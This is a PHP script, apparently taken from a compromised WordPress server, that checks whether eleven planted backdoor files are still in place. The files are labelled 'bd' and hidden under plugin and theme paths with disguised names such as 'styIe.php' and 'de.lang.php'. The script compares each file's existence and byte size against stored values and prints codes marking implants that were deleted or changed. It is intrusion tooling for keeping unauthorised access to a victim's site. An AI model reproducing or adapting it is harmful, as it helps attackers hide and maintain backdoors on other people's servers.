<?php $r = '/home/masthtpt/public_html'; $x = ["/wp-content/plugins/weight-based-shipping-for-woocommerce/server/vendor/dangoodman/shengine/src/Conditions/Common/tell_a_friend.php"=>"bd@@1023528@@981",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/BeaverBuilder/includes/methods.php"=>"bd@@1011792@@915",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Domain/Services/Email/cancel.php"=>"bd@@1012326@@1010",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slider/SliderPublish/de.lang.php"=>"bd@@1010825@@815",
"/wp-content/plugins/facebook-for-woocommerce/vendor/woocommerce/action-scheduler-job-framework/src/Utilities/News.module.php"=>"bd@@1023912@@912",
"/wp-content/themes/top_1759184371/styIe.php"=>"bd@@1006790@@1126",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Dashboard/DashboardManager/menu_reg.php"=>"bd@@1010393@@848",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/GoPro/Template/data_role_cache.php"=>"bd@@1023714@@850",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/AdminError/mult_submits.inc.php"=>"bd@@1011441@@896",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/Header/menubar.php"=>"bd@@1023224@@904",
"/wp-content/plugins/elementor/core/app/modules/kit-library/data/kits/auctionapproval.php"=>"bd@@1023782@@1042"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');